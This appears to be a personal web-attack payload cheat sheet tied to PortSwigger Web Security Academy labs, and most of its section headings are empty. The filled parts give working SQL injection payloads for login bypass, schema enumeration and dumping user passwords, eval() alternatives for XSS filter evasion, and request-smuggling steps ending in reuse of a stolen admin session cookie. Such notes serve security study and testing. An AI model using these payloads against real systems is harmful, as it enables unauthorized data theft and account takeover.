Payloads
SQLi
UNION SQLi
#clause bypass
'+OR+1=1--
#login bypass
administrator'--
#union detection
'+ORDER+BY+1--
'+ORDER+BY+2--
'+ORDER+BY+3--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'abcdef',NULL,NULL--
#Oracle version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
#MySQL and Microsoft version
'+UNION+SELECT+@@version,+NULL#
#Tables names
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
#Tables names Oracle
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
#More columns in one
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Blind SQLi
Blind error based SQLi
Visible Error
Blind Time-based
Out of Band Interactions
SQLI inside XML
XSS
DOM-based XSS
Using the eval() method evaluates or executes an argument.
Using atob() or btoa() is function used for encoding to and from base64 format strings.
If eval() being blocked then Alternatives:
setTimeout("code")
setInterval("code)
setImmediate("code")
Function("code")()
XSS web messages
Reflected
Stored
XSS stealers
XSS to CSRF
CSRF
CSWSH - Cross-Site WebSocket Hijacking
CORS
XXE
Blind XXE
External DTD XXE
XInclude injection
XXE image upload
SSRF
Request Smuggling
CL.TE
TE.CL
H2.CL
Send the request a few times and confirm that you receive a redirect to the exploit server.
Resend the request and wait for 10 seconds or so.
Go to the exploit server and check the access log. If you see a
GET /resources/request from the victim, this indicates that your request smuggling attack was successful
H2.TE
Send the request to poison the response queue. You will receive the 404 response to your own request.
Wait for around 5 seconds, then send the request again to fetch an arbitrary response.
Repeat this process until you capture a 302 response containing the admin's new post-login session cookie.
Copy the session cookie and use it to send the following request:
GET /admin HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=STOLEN-SESSION-COOKIE
H2 CRLF Injeciton
Note: enable the Allow HTTP/2 ALPN override option and change the body of HTTP/2 request to below POST request.
H2.TE desync v10a h2path
CL.0
Using the drop-down menu next to the Send button, change the send mode to Send group in sequence (single connection).
OS cmd injection
SSTI
Path Traversal
Authentication
Web Sockets
oAuth
Deserialization
JWT
https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list
Prototype pollution
Last updated
